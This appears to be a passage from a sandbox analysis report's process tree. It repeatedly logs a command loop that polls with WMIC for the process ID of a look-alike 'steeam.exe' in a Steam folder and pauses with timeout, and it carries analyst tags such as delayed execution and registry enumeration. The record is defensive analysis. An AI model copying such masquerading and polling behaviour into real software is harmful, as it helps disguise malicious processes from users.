C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4888 -s 2607⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
